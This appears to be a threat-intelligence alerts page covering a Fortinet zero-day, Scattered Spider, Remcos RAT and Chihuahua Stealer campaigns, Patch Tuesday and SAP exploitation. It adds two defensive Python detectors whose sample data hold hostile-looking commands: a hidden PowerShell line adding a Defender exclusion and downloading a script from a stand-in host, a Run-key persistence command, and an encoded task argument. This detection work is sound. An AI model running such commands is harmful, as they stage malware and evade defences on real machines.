
Threat Alerts
Your place for the latest CyberProof cyber threat intelligence alerts and updates
Fortinet Patches Critical Zero-Day Vulnerability Exploited in the Wild (CVE-2025-32756)
Fortinet has released security updates addressing a critical vulnerability (CVE-2025-32756) that has been actively exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. The flaw, which carries a CVSS score of 9.6, is a stack-based buffer overflow (CWE-121) that could allow remote unauthenticated attackers to execute arbitrary code or commands via specially crafted HTTP requests.
According to Fortinet’s advisory, the vulnerability impacts multiple products including FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. While the company confirmed active exploitation on FortiVoice systems, it did not disclose the scale or attribution of the attacks.
Attackers reportedly conducted network scans, enabled FCGI debugging to log credentials from login attempts, and erased system crash logs to cover their tracks. Fortinet's advisory lists both the enabled FCGI debugging setting and the missing crash logs as indicators of compromise, so affected devices should be reviewed for them rather than simply patched. Where the fixed firmware cannot be applied immediately, Fortinet's published workaround is to disable the HTTP/HTTPS administrative interface, which is the path the crafted requests reach.
Scattered Spider Hackers Shift Focus to U.S. Retail Sector
Researchers have warned that hackers using Scattered Spider tactics, who recently attacked UK retail chains including Marks & Spencer, Co-op, and potentially Harrods, have now expanded their operations to target US retailers. The threat actors, also tracked as UNC3944, 0ktapus, Scatter Swine, Starfraud, and Muddled Libra, are employing ransomware and extortion operations against the retail sector, continuing their pattern of focusing on one industry at a time. These attackers are known for sophisticated social engineering techniques including phishing, SIM swapping, and MFA bombing, and have previously compromised high-profile organizations such as MGM Resorts, Twilio, Coinbase, and Reddit. The DragonForce ransomware operation, which emerged in December 2023 and has claimed responsibility for the UK retail attacks, appears to be the latest ransomware variant utilized by this fluid collective of threat actors who have previously affiliated with RansomHub, Qilin, and BlackCat ransomware operations.
Remcos RAT Delivered via PowerShell Loader in Fileless Attack Chain
A recent campaign demonstrates the continued evolution of fileless malware delivery, using a stealthy PowerShell-based shellcode loader to deploy Remcos RAT. The attack begins with ZIP archives containing malicious LNK files disguised as Office documents; the LNK launches mshta.exe, which proxies execution of embedded VBScript. That script downloads PowerShell payloads into the C:\Users\Public\ directory, adds Windows Defender exclusion rules so that the staging path is never scanned, and writes registry entries for persistence.
Once the PowerShell script is executed, it decodes obfuscated Base64 strings to reconstruct two binary blobs: a lightweight shellcode loader and a full Remcos RAT payload. The loader allocates executable memory with VirtualAlloc, copies the shellcode into it, and runs it by handing the buffer's address to CallWindowProcW as the window procedure, so the payload executes without ever being written to disk. The loader also resolves the Windows APIs it needs at run time by walking the Process Environment Block (PEB) to the loaded-module list, a common evasion tactic that leaves it with no import table entries for static analysis to flag.
The final payload, Remcos RAT v6.0.0 Pro, operates fully in memory and connects to its command-and-control server over TLS on port 2025. It supports keylogging, clipboard access, screenshot capture, webcam/mic recording, UAC bypass, and process injection into svchost.exe via process hollowing. It also includes anti-analysis features like debugger detection and custom exception handlers. Remcos achieves persistence through registry entries and maintains control through a watchdog module to ensure continued operation even if interrupted.
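The chain above leaves a recognisable trail in endpoint process-creation telemetry. The following Python is an added example, not code from the article or from the campaign: it runs four rules over constructed Sysmon-style process-creation events (the PIDs, file paths and hostnames are hypothetical) and flags mshta.exe spawning PowerShell, a PowerShell command line staging files under C:\Users\Public\, Add-MpPreference exclusion changes, and Run-key writes.

```python
"""Process-tree rules for the LNK -> mshta.exe -> PowerShell chain.

Added example with constructed telemetry; the rules encode only behaviours
named in the alert above, not indicators from any real sample.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process, as Sysmon EID 1 logs it
    cmdline: str    # command line as logged


def basename(path: str) -> str:
    """Last path component, lower-cased, without surrounding quotes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


POWERSHELL = {"powershell.exe", "pwsh.exe"}
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)
MP_EXCL = re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\b", re.I)
REG_WRITE = re.compile(r"(\breg(\.exe)?\s+add\b|new-itemproperty|set-itemproperty)", re.I)


# Each rule sees the event and its parent (None if the parent was not logged).
def r_mshta_parent(ev: ProcEvent, parent) -> bool:
    return parent is not None and basename(parent.image) == "mshta.exe" \
        and basename(ev.image) in POWERSHELL


def r_public_staging(ev: ProcEvent, parent) -> bool:
    return basename(ev.image) in POWERSHELL and PUBLIC_DIR.search(ev.cmdline) is not None


def r_defender_exclusion(ev: ProcEvent, parent) -> bool:
    return MP_EXCL.search(ev.cmdline) is not None


def r_run_key(ev: ProcEvent, parent) -> bool:
    return bool(RUN_KEY.search(ev.cmdline) and REG_WRITE.search(ev.cmdline))


RULES = [
    ("mshta_spawns_powershell", r_mshta_parent),
    ("payload_staged_in_public", r_public_staging),
    ("defender_exclusion_added", r_defender_exclusion),
    ("run_key_persistence", r_run_key),
]


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) for every rule each event trips."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for name, pred in RULES:
            if pred(ev, parent):
                findings.append((ev.pid, name))
    return findings


def suspicious_pids(findings: List[Tuple[int, str]], threshold: int = 2) -> Set[int]:
    """PIDs that tripped at least `threshold` rules: several stages of the chain on one process."""
    counts: Dict[int, int] = {}
    for pid, _ in findings:
        counts[pid] = counts.get(pid, 0) + 1
    return {pid for pid, n in counts.items() if n >= threshold}


# Constructed sample telemetry (hypothetical PIDs, paths and hostnames).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # LNK disguised as an Office document launches mshta.exe with an HTA
    ProcEvent(4120, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\AppData\Local\Temp\Invoice_Q2.hta"'),
    # embedded VBScript proxies to PowerShell: Defender exclusion plus staging in Public
    ProcEvent(4188, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "Add-MpPreference -ExclusionPath C:\Users\Public; '
              r'iwr https://cdn.example.invalid/upd.ps1 -OutFile C:\Users\Public\upd.ps1"'),
    # Run-key persistence pointing back at the staged script
    ProcEvent(4200, 4188, r"C:\Windows\System32\reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ '
              r'/d "powershell -w hidden -f C:\Users\Public\upd.ps1" /f'),
    # benign admin script launched from the desktop: must not trigger
    ProcEvent(5000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\nightly_backup.ps1"),
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for pid, rule in hits:
        print(f"pid {pid}: {rule}")
    print("high-confidence pids:", suspicious_pids(hits))
```

The parent-child rule is the strongest single signal because mshta.exe has almost no legitimate reason to spawn PowerShell; the other three fire on plenty of administrative activity in isolation, which is why the example only promotes a process to high confidence when several rules hit it.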
Chihuahua Stealer Deploys Multi Stage Payloads for Data Theft
Chihuahua Stealer is a newly identified .NET-based infostealer that demonstrates a more refined infection chain compared to typical commodity malware. It poses a risk to users through stealthy delivery mechanisms and persistent tactics, combining traditional infostealer objectives—such as harvesting browser credentials and cryptocurrency wallet data—with less common encryption and exfiltration methods. The malware is primarily spread through deceptive document links hosted on cloud storage platforms, where victims are lured into executing obfuscated PowerShell scripts. Its multi-stage architecture and in-memory execution strategies make it difficult to detect and analyze, increasing the potential impact on individuals and organizations exposed to this threat.
The infection begins with a malicious PowerShell script that initiates a staged execution process using encoded and obfuscated payloads. Persistence is achieved by registering scheduled tasks that continuously scan for infection markers and fetch follow-up payloads from multiple fallback domains. The main executable is eventually loaded into memory and run using .NET reflection, bypassing disk-based detection methods. Once active, the malware collects system identifiers and checks for the presence of specific browser directories and crypto wallet extensions. It extracts stored credentials, session data, and wallet files before compressing and encrypting them into a custom archive format.
After encryption, the stolen data is uploaded to a remote server over HTTPS, and the malware then cleans up after itself by clearing clipboard contents and removing its temporary files and scheduled tasks. Encrypting the archive is unusual for an infostealer, but because the key is embedded in the sample it protects the data only from casual inspection: an analyst who recovers the key from the binary can decrypt captured archives. Nevertheless, the combination of in-memory loading, scheduled execution, and fallback command-and-control domains illustrates an effort to avoid detection and maintain operational flexibility. The campaign shows how relatively simple components, when chained effectively, can produce a capable and evasive information-stealing tool.
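Scheduled-task persistence of the kind described above can be triaged offline from exported task definitions (the output of schtasks /query /XML, or the XML files stored under C:\Windows\System32\Tasks). The Python below is an added example, not code from the article or from the malware: the two task definitions are constructed, the task names and vendor path are hypothetical, and the thresholds are illustrative. It flags tasks whose action is a script host, whose arguments look encoded or hidden, that are hidden from the Task Scheduler UI, or that repeat on a tight interval, which is what a task that "continuously scans for infection markers" looks like.

```python
"""Triage exported Task Scheduler XML for script-host persistence.

Added example with constructed task definitions; the Task Scheduler XML
namespace and element names are the real ones, everything else is made up.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden"
    r"|-ep\s+bypass|\biex\b|invoke-expression|downloadstring|frombase64string)",
    re.I,
)
TIGHT_INTERVAL_SECONDS = 600  # illustrative threshold: repeats every 10 minutes or faster


def iso_duration_seconds(text: Optional[str]) -> Optional[int]:
    """Parse the ISO 8601 durations Task Scheduler uses (e.g. PT5M, P1DT2H)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", (text or "").strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def exe_name(command: str) -> str:
    return command.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def triage_task(xml_text: str) -> List[str]:
    """Return the list of reasons a task definition looks like script persistence."""
    root = ET.fromstring(xml_text)
    reasons: List[str] = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        exe = exe_name(cmd)
        if exe in SCRIPT_HOSTS:
            reasons.append(f"script host action: {exe}")
        if SUSPICIOUS_ARGS.search(args):
            reasons.append("encoded, hidden or download-and-execute arguments")
    if root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=NS).strip().lower() == "true":
        reasons.append("task hidden from UI")
    for iv in root.findall(".//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(iv.text)
        if secs is not None and secs <= TIGHT_INTERVAL_SECONDS:
            reasons.append(f"tight repetition ({(iv.text or '').strip()})")
    return reasons


def triage_tasks(tasks: Dict[str, str]) -> Dict[str, List[str]]:
    """Map task name -> reasons, keeping only tasks that raised at least one reason."""
    return {name: r for name, xml_text in tasks.items() if (r := triage_task(xml_text))}


# Constructed definitions. The first mimics the behaviour in the alert; the second is a benign updater.
MALICIOUS_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-05-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-05-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\Program Files\\ExampleVendor\\updater.exe"</Command>
      <Arguments>/silent /checknow</Arguments>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_TASKS = {"\\SysUpd": MALICIOUS_TASK, "\\ExampleVendor Updater": BENIGN_TASK}

if __name__ == "__main__":
    for name, reasons in triage_tasks(SAMPLE_TASKS).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

Because the stealer removes its own scheduled tasks once exfiltration is done, a point-in-time export can come back clean; pair this triage with task-creation events (Security Event ID 4698) so that short-lived tasks are still recorded.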
Microsoft May 2025 Patch Tuesday Fixes 72 Flaws, Including 5 Exploited Zero-Days
Microsoft's May 2025 Patch Tuesday update delivers fixes for 72 vulnerabilities, including 5 actively exploited zero-days and 1 publicly disclosed zero-day. The publicly disclosed one is CVE-2025-32702 (CVSS 7.8), an improper neutralization of special elements used in a command ("command injection") in Visual Studio that allows an unauthorized attacker to execute code locally.
Four of the five actively exploited zero-days are elevation-of-privilege bugs that let an authorized local attacker gain higher privileges: CVE-2025-30400 (CVSS 7.8) in the Microsoft DWM Core Library, CVE-2025-32701 (CVSS 7.8) and CVE-2025-32706 (CVSS 7.8) in the Windows Common Log File System driver, and CVE-2025-32709 (CVSS 7.8) in the Windows Ancillary Function Driver for WinSock. The fifth, CVE-2025-30397 (CVSS 7.5), is a Scripting Engine memory-corruption vulnerability that allows an unauthenticated attacker to achieve remote code execution by tricking a user into clicking a specially crafted link in Edge or Internet Explorer.
A number of critical vulnerabilities have also been addressed, including Azure-related flaws CVE-2025-33072 (CVSS 8.1), CVE-2025-29972 (CVSS 9.9), CVE-2025-29813 (CVSS 10), CVE-2025-30387 (CVSS 9.8), and CVE-2025-29827 (CVSS 9.1), and critical remote code execution (RCE) vulnerabilities in Microsoft Office and Windows Remote Desktop: CVE-2025-30377 (CVSS 8.4), CVE-2025-30386 (CVSS 8.4), CVE-2025-29966 (CVSS 8.8), and CVE-2025-29967 (CVSS 8.8). Lastly, CVE-2025-47732 (CVSS 8.7) addresses a critical RCE vulnerability in Microsoft Dataverse. With five zero-days under active exploitation, a public proof of concept already out for CVE-2025-32702, and several critical-severity flaws in the same release, organizations are strongly urged to prioritize patching to reduce the risk of exploitation and compromise.
RansomEXX and BianLian Expand SAP Exploitation Campaign
The latest round of attacks targeting CVE-2025-31324 (CVSS 10.0), an unauthenticated file-upload flaw in the SAP NetWeaver Visual Composer Metadata Uploader, has been linked to the RansomEXX and BianLian ransomware groups. The campaign marks a shift from the previously observed state-linked exploitation to financially motivated activity. Unpatched SAP systems are being compromised to deploy web shells, followed by the modular trojan PipeMagic and advanced post-exploitation tooling.
RansomEXX was previously seen deploying PipeMagic in an earlier campaign that leveraged CVE-2025-29824 (CVSS 7.8), a Windows CLFS zero-day used for SYSTEM-level privilege escalation. The reuse of this tool, combined with overlapping infrastructure and tradecraft, suggests a flexible and opportunistic approach to exploiting critical vulnerabilities across enterprise platforms. The shift toward SAP—an ERP backbone in many industries—demonstrates an escalation in both scope and potential impact.
In addition to CVE-2025-31324, attackers have also leveraged CVE-2025-42999 (CVSS 9.1), an insecure deserialization vulnerability in the same Visual Composer component. While exploitation details remain limited, the two flaws are being chained in some cases, likely to support persistence or to improve success rates across varied configurations. The coordinated use of both suggests a working understanding of SAP internals and a continued effort to expand the attack surface within enterprise environments. Because the patch for CVE-2025-31324 alone does not close CVE-2025-42999, administrators should confirm both fixes are applied and check the Visual Composer upload path for unexpected files.